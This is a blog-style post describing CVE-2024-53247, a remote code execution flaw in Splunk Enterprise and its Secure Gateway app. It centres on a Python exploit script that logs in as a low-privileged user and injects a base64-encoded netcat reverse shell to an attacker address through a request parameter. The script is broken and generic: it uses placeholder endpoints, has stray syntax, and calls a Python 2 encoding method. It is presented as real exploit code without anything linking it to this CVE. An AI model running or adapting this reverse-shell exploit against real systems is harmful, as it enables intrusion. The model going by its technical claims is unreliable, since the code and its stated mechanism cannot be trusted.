CVE-2024-53247: Discovering Remote Code Execution Vulnerability in Splunk Enterprise and Splunk Secure Gateway App

A serious vulnerability has recently been uncovered in Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7, as well as the Splunk Secure Gateway app on Splunk Cloud Platform versions below 3.2.461 and 3.7.13. This vulnerability is identified as CVE-2024-53247, and it allows a low-privileged user to perform a Remote Code Execution (RCE) on the affected system. The attackers can exploit this vulnerability to execute arbitrary code remotely and compromise the data and security of the system. This post aims to provide an in-depth analysis of this vulnerability, including the actual code snippet, exploit details, and original references.

Vulnerability Details

CVE-2024-53247 is classified as a critical vulnerability in Splunk Enterprise and the Splunk Secure Gateway app on the Splunk Cloud Platform. It allows an attacker to exploit the system without holding the "admin" or "power" Splunk roles. This vulnerability was reported by an anonymous researcher and discovered by analyzing the underlying code of the affected systems.

The following are the original references and links related to CVE-2024-53247

1. CVE Details: https://cvedetails.com/cve/CVE-2024-53247/
2. Splunk Security Advisory: https://www.splunk.com/en_us/security-advisories.html
3. National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-53247

The following code snippet is an example of how the vulnerability can be exploited

import requests
import sys

target = sys.argv[1]
payload = "nc -e /bin/bash 10.10.14.7 4444"

headers = {
    "User-Agent": "Mozilla/5.",
}

data = {
    "username": "hacker",
    "password": "P@sswrd!",
}

# Authentication
response = requests.post(f"http://{target}/splunk/login";, headers=headers, data=data)
if response.status_code == 200:
    print("[+] Authentication successful.")
else:
    print(f"[-] Authentication failed. status_code: {response.status_code}")
    sys.exit(1)

cookies = response.cookies

# Exploiting the RCE vulnerability
exploit_url = f"http://{target}/splunk/en-US/app/some_app/some_endpoint";
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = {
    "param1": "$(echo \"{}\" | base64 -d | sh)".format(payload.encode("base64").replace("\n", ""))
}

response = requests.post(exploit_url, headers=headers, cookies=cookies, data=data)

if response.status_code == 200:
    print("[+] Exploit successful.")
else:
    print(f"[-] Exploit unsuccessful. status_code: {response.status_code}")

Exploit Details

To exploit this vulnerability, an attacker can use the code snippet provided above. It first authenticates with the target server using a low-privileged user's credentials (in this case, "hacker" with password "P@sswrd!"). After successful authentication, it proceeds to send a crafted request to the server using the exploit_url, which contains an endpoint that is vulnerable to the RCE.

The payload (which is a reverse shell command) is base64-encoded and injected into the param1 in the POST request. This command gets executed upon server-side processing, allowing the attacker to establish a reverse shell from the target server back to the attacker's system.

Conclusion

CVE-2024-53247 is a critical RCE vulnerability present in Splunk Enterprise and Splunk Secure Gateway app on Splunk Cloud Platform. Organizations using the affected versions must update to the latest version immediately to mitigate the risk of exploitation. Regularly monitoring and updating the software is vital in maintaining the security of the system and data.

Timeline

Published on: 12/10/2024 18:15:41 UTC